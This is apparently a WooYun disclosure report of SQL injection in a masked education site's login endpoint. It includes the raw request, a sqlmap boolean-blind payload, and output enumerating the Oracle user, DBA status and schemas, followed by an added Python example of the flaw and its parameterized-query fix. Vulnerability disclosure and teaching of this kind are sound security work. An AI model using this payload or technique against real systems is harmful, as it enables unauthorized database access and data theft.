WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2015-12-20: Details sent to the vendor, awaiting vendor handling
2015-12-24: Vendor has confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public
As the title says.
http://**.**.**.**
POST /login.shtml?cardid=-1&date=1449770720840&method=compareCardid&role=3 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**
Cookie: JSESSIONID=3017C0DDC9647B25A515F42EEBC7BD27; AD_RS_COOKIE=20110649
Host: **.**.**.**
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The cardid parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cardid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: cardid=-2895' OR 2468=2468 AND 'NAAl'='NAAl&date=1449770720840&method=compareCardid&role=3
---
[14:49:11] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:49:11] [INFO] fetching current user
[14:49:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:49:12] [INFO] retrieved: F_EDU
current user: 'F_EDU'
[14:49:49] [INFO] fetching current database
[14:49:49] [INFO] resumed: F_EDU
[14:49:49] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'F_EDU'
[14:49:49] [INFO] testing if current user is DBA
current user is DBA: True
[14:49:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:49:50] [INFO] fetching database (schema) names
[14:49:50] [INFO] fetching number of databases
[14:49:50] [INFO] retrieved: 24
[14:50:10] [INFO] retrieved: APEX_030200
[14:52:41] [INFO] retrieved: APPQOSSYS
[14:54:54] [INFO] retrieved: CTXSYS
[14:56:25] [INFO] retrieved: DBSNMP
[14:57:49] [INFO] retrieved: DD
[14:58:31] [INFO] retrieved: EDU
[14:59:19] [INFO] retrieved: EDUDB
[15:00:42] [INFO] retrieved: EDU_FINAL
[15:02:47] [INFO] retrieved: EXFSYS
[15:04:37] [INFO] retrieved: FLOWS_FILES
[15:07:13] [INFO] retrieved: F_EDU
[15:08:27] [INFO] retrieved: F_EDU_YX
The network is laggy, so that is all for this one.
Injection exists in multiple places.
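The sqlmap output above shows a boolean-based blind injection: the application answers the compareCardid lookup with a yes/no result, and an attacker-controlled condition appended to the quoted cardid value flips that answer. The following is an added illustration of that mechanism and of its fix, not code from the report or from the affected site. The target runs JSP on Oracle; this example uses Python with sqlite3 only so it runs offline, and the card table, its column name, and the sample card numbers are constructed assumptions. It runs the payload recorded by sqlmap against a string-concatenated query and against a parameterized one, so the difference in behaviour is visible directly.

```python
import sqlite3

# Constructed sample data standing in for the card table the lookup queries
# (table and column names are assumptions; the real schema is not on the page).
SAMPLE_CARDS = ["20110649", "30220001"]

# The injection point's payload as sqlmap recorded it, minus the other
# query-string parameters (they do not reach the SQL statement).
TRUE_PAYLOAD = "-2895' OR 2468=2468 AND 'NAAl'='NAAl"
# Same shape with the arithmetic comparison made false; a blind injection is
# identified by the application answering these two inputs differently.
FALSE_PAYLOAD = "-2895' OR 2468=2469 AND 'NAAl'='NAAl"


def make_db():
    """Create an in-memory database holding the constructed card table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE card (cardid TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO card VALUES (?)", [(c,) for c in SAMPLE_CARDS])
    return conn


def compare_cardid_vulnerable(conn, cardid):
    """Lookup built by string concatenation, the pattern behind the finding.

    The single quote in the payload closes the literal, so the attacker's
    condition is evaluated as part of the WHERE clause.
    """
    sql = "SELECT COUNT(*) FROM card WHERE cardid = '" + cardid + "'"
    return conn.execute(sql).fetchone()[0] > 0


def compare_cardid_parameterized(conn, cardid):
    """Same lookup with a bound parameter.

    The driver passes the whole input as one value to compare against cardid,
    so quotes and keywords inside it never become SQL.
    """
    sql = "SELECT COUNT(*) FROM card WHERE cardid = ?"
    return conn.execute(sql, (cardid,)).fetchone()[0] > 0


def run_comparison():
    """Run both lookups over a benign id, an unknown id and the two payloads.

    Returns a dict keyed by input label; each value is a (vulnerable, safe)
    pair of booleans.
    """
    conn = make_db()
    inputs = {
        "known_card": SAMPLE_CARDS[0],
        "unknown_card": "99999999",
        "true_payload": TRUE_PAYLOAD,
        "false_payload": FALSE_PAYLOAD,
    }
    results = {}
    for label, value in inputs.items():
        results[label] = (
            compare_cardid_vulnerable(conn, value),
            compare_cardid_parameterized(conn, value),
        )
    conn.close()
    return results


def is_blind_injectable(results):
    """True when the true/false payload pair yields different answers.

    That observable difference is exactly what sqmap's boolean-based blind
    technique relies on; the parameterized version shows none.
    """
    return results["true_payload"][0] != results["false_payload"][0]


if __name__ == "__main__":
    res = run_comparison()
    for label, (vuln, safe) in res.items():
        print(f"{label:14s} concatenated={vuln!s:5s} parameterized={safe!s:5s}")
    print("blind injection observable on concatenated query:", is_blind_injectable(res))
```

On the concatenated query the true payload returns a positive "card exists" answer although no such card exists, and the false payload returns a negative one; a parameterized query answers both with a plain "no card", because the payload is compared literally against the cardid column. That is the fix for this class of finding on the JSP side as well: bind the value through a PreparedStatement instead of concatenating it into the statement text.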
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-12-24 17:04
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: High. Attack cost: Low. Impact: High. Overall rating: High, rank: 10. We are contacting the management unit of the affected website to handle it.
None yet.